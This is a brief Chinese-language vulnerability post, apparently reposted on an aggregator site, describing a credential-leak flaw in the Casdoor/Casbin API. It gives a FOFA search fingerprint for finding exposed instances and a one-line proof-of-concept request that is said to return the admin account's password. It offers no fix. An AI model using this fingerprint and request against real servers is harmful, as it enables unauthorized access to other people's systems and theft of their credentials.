Casbin 账号密码泄漏漏洞
Posted 李白你好
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Casbin 账号密码泄漏漏洞相关的知识,希望对你有一定的参考价值。
0x01 漏洞描述
Casbin是一个支持如ACL,RBAC,ABAC等访问模型,可用于Golang,Java,C/C++,Node.js,javascript,php,Laravel,Python,.NET(C#),Delphi,Rust,Ruby,Lua(OpenResty),Dart(Flutter)和Elixir的授权库。Casbin的api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取web后台权限。
0x02 漏洞指纹
FOFA
title="Casdoor"
0x03 漏洞复现
1.执行的POC,得到admin账户密码
http://ip/api/get-users?p=123&pageSize=123
以上是关于Casbin 账号密码泄漏漏洞的主要内容,如果未能解决你的问题,请参考以下文章